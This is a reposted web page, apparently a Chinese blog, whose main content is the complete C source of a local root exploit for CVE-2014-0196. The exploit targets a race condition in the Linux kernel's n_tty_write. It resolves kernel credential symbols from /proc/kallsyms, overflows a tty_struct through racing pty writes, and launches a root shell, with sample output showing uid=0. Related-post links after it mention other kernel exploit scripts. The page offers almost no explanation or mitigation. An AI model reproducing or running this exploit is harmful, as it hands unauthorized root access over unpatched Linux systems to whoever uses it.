x86linux write函数,CVE-2014-0196 Linux kernel n_tty_write’函数竞争条件漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...

最新推荐文章于 2022-11-14 00:23:00 发布
最新推荐文章于 2022-11-14 00:23:00 发布
阅读量109 收藏
点赞数
文章标签: x86linux write函数

/*

* CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

* condition

*

* Slightly-less-than-POC privilege escalation exploit

* For kernels >= v3.14-rc1

*

* Matthew Daley

*

* Usage:

* $ gcc cve-2014-0196-md.c -lutil -lpthread

* $ ./a.out

* [+] Resolving symbols

* [+] Resolved commit_creds: 0xffffffff81056694

* [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

* [+] Doing once-off allocations

* [+] Attempting to overflow into a tty_struct...............

* [+] Got it :)

* # id

* uid=0(root) gid=0(root) groups=0(root)

*

* WARNING: The overflow placement is still less-than-ideal; there is a 1/4

* chance that the overflow will go off the end of a slab. This does not

* necessarily lead to an immediate kernel crash, but you should be prepared

* for the worst (i.e. kernel oopsing in a bad state). In theory this would be

* avoidable by reading /proc/slabinfo on systems where it is still available

* to unprivileged users.

*

* Caveat: The vulnerability should be exploitable all the way from

* v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

* commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

* GFP_ATOMIC memory consumption") that make exploitation simpler, which this

* exploit relies on.

*

* Thanks to Jon Oberheide for his help on exploitation technique.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS 30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

int counter;

} atomic_t;

struct kref {

atomic_t refcount;

};

struct tty_struct_header {

intmagic;

struct kref kref;

struct device *dev;

struct tty_driver *driver;

const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

commit_creds(prepare_kernel_cred(0));

return 0;

}

unsigned long get_symbol(char *target_name) {

FILE *f;

unsigned long addr;

char dummy;

char name[256];

int ret = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL)

return 0;

while (ret != EOF) {

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

if (ret == 0) {

fscanf(f, "%s\n", name);

continue;

}

if (!strcmp(name, target_name)) {

printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

fclose(f);

return addr;

}

}

printf("[-] Couldn't resolve \"%s\"\n", name);

fclose(f);

return 0;

}

void *overwrite_thread_fn(void *p) {

write(slave_fd, buf, 511);

write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

char scratch[1024] = {0};

void *tty_operations[64];

int i, temp_fd_1, temp_fd_2;

for (i = 0; i < 64; ++i)

tty_operations[i] = payload;

overwrite.magic = TTY_MAGIC;

overwrite.kref.refcount.counter = 0x1337;

overwrite.dev = (struct device *)scratch;

overwrite.driver = (struct tty_driver *)scratch;

overwrite.ops = (struct tty_operations *)tty_operations;

puts("[+] Resolving symbols");

commit_creds = (commit_creds_fn)get_symbol("commit_creds");

prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

if (!commit_creds || !prepare_kernel_cred)

return 1;

puts("[+] Doing once-off allocations");

for (i = 0; i < ONEOFF_ALLOCS; ++i)

if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

puts("[-] pty creation failed");

return 1;

}

printf("[+] Attempting to overflow into a tty_struct...");

fflush(stdout);

for (i = 0; ; ++i) {

struct termios t;

int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

pthread_t overwrite_thread;

if (!(i & 0xfff)) {

putchar('.');

fflush(stdout);

}

if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

puts("\n[-] pty creation failed");

return 1;

}

for (j = 0; j < RUN_ALLOCS; ++j)

if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

puts("\n[-] pty creation failed");

return 1;

}

close(fds[RUN_ALLOCS / 2]);

close(fds2[RUN_ALLOCS / 2]);

write(slave_fd, buf, 1);

tcgetattr(master_fd, &t);

t.c_oflag &= ~OPOST;

t.c_lflag |= ECHO;

tcsetattr(master_fd, TCSANOW, &t);

if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

puts("\n[-] Overwrite thread creation failed");

return 1;

}

write(master_fd, "A", 1);

pthread_join(overwrite_thread, NULL);

for (j = 0; j < RUN_ALLOCS; ++j) {

if (j == RUN_ALLOCS / 2)

continue;

ioctl(fds[j], 0xdeadbeef);

ioctl(fds2[j], 0xdeadbeef);

close(fds[j]);

close(fds2[j]);

}

ioctl(master_fd, 0xdeadbeef);

ioctl(slave_fd, 0xdeadbeef);

close(master_fd);

close(slave_fd);

if (!setresuid(0, 0, 0)) {

setresgid(0, 0, 0);

puts("\n[+] Got it :)");

execl("/bin/bash", "/bin/bash", NULL);

}

}

}

Andy Kwong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux tty驱动学习 - UART驱动的write操作流程
sbctsp的博客
01-06 8066
tty核心层到最后把数据写入到硬件,整个操作流程如下:tty_write() -> do_tty_write() -> n_tty_write() -> uart_write() -> serial8250_start_tx() -> serial_out()。也就是从tty核心层到线路规程,然后到tty驱动层,再到UART驱动层,最后到UART端口的输出寄存器中。 首先看tty核心的写操作t
linux内核竞争,Linux Kernel “n_tty_write()” 竞争条件漏洞
weixin_42594427的博客
05-03 310
发布日期:2014-05-07更新日期:2014-05-08受影响系统:Linux kernel 3.4.89Linux kernel 3.2.58Linux kernel 3.14.3Linux kernel 3.12.18Linux kernel 3.10.39Linux kernel 2.6.32.61描述:------------------------------------------...
java 操作uart串口_【tty】应用程序调用write写串口调用流程
weixin_42361733的博客
03-01 621
这几天在跟进串口使能流控后收发异常问题,特简单梳理了下应用程序执行write操作的调用流程,在这简单记录下,平台为全志方案tty_io.c tty_io.c n_tty.c serial_core.c sunxi_uart.ctty_wr...
tty_read和tty_write
weixin_37303427的博客
01-29 1821
一、tty_read 对于tty_read这个函数,很多标志我也没有弄得太清楚,但是问题不大,以后有机会在看。我觉得重点是看数据怎么从cdc驱动到通过线路规划到tty,再从tty到用户空间。标志位等东西都是为这一个数据的流程服务的。 static ssize_t tty_read(struct file *file, char __user *buf, size_t count,      ...
打通linuxtty驱动的数据链路,打通LinuxTTY驱动的数据链路
weixin_28693309的博客
05-14 117
打通LinuxTTY驱动的数据链路一、首先把tty驱动在linux中的分层结构理清楚:自上而下分为TTY核心层、TTY线路规程、TTY驱动。二、TTY核心层与线路规程层分析用户空间的程序直接对tty核心层进行读写等相关操作,在tty_io.c中:int__init tty_init(void){cdev_init(&tty_cdev,&tty_fops);if(cdev_add(...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升级OpenSSL到OpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞(OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升级OpenSSL到OpenSSL 1.0.1g,同时重新编译升级OpenSSH和nginx,在此提供...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
Netty源码分析 (八)----- write过程 源码分析
weixin_30294709的博客
09-16 208
上一篇文章主要讲了netty的read过程,本文主要分析一下writewriteAndFlush。 主要内容 本文分以下几个部分阐述一个java对象最后是如何转变成字节流,写到socket缓冲区中去的 pipeline中的标准链表结构 java对象编码过程 write:写队列 flush:刷新写队列 writeAndFlush: 写队列并刷新 pipeline中...
TTY驱动读写流程随笔
奶牛养殖场小马
11-14 326
TTY驱动读写流程的一点随笔
linux 字符驱动 tty,打通linuxtty驱动的数据链路
weixin_33208553的博客
05-12 177
一、首先把tty驱动在linux中的分层结构理清楚:本文引用地址:http://www.eepw.com.cn/article/201610/305940.htm自上而下分为TTY核心层、TTY线路规程、TTY驱动。二、TTY核心层与线路规程层分析用户空间的程序直接对tty核心层进行读写等相关操作,在tty_io.c中:int__init tty_init(void){cdev_init(tty_...
tty write return EAGAIN
u011279649的专栏
11-12 1573
/**************************************************************/ EAGAIN是从哪里返回的? 仔细debug一下,看系统函数哪里返回了这个值?应用程序的error number肯定是系统调用的返回值。 fs/read_write.c SYSCALL_DEFINE3(write, unsigned int, fd, c
从串口驱动到Linux驱动模型
诗筱涵的博客
10-25 356
由于文章太长建议点链接进去看,里面梳理了一些基本概念,我对这些的理解也差不多。 摘自:https://mp.weixin.qq.com/s/O5R1bxbxFYFWGveXFEazIg
Linux串口驱动程序(4)-数据发送
小虾米编程
06-12 1627
1.tty数据发送调用关系 怎么样才能找到发送数据所使用的函数呢?打开uart_register_driver函数,找到里面的tty_register_driver,转到定义,这里调用了tty_fops这个结构,这几结构里就保存了读写串口的函数tty_write: static const struct file_operations tty_fops = { .llseek = no_l...
Linux UART 驱动 Part-2 (tty 层流程)
StephenZhou
08-13 3782
目录 1、Operations 1.1、file operation 1.2、tty operations 1.3、tty_ldisc_ops 1.4、uart_ops 2、Open 流程 3、Write 流程 3.1、tty_write 3.2、n_tty_write 3.3、uart_write 3.4、start_tx 4、Read 流程 4.1、tty_read ...
Linux串口驱动(4) - write详解
四季帆的博客
06-26 1547
经过前面三个部分的初始化,后面的操作就是直接使用前面的配置了。 1. 用户空间write的操作实现 tty_write -->ld = tty_ldisc_ref_wait(tty); -->wait_event(tty_ldisc_wait, (ld = tty_ldisc_try(tty)) != NULL); //tty_ldisc_wait等待队列一直等待直到等待的条件成立,所以接下来的关键要看tty_ldisc_try(tty)这个函数 ...
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值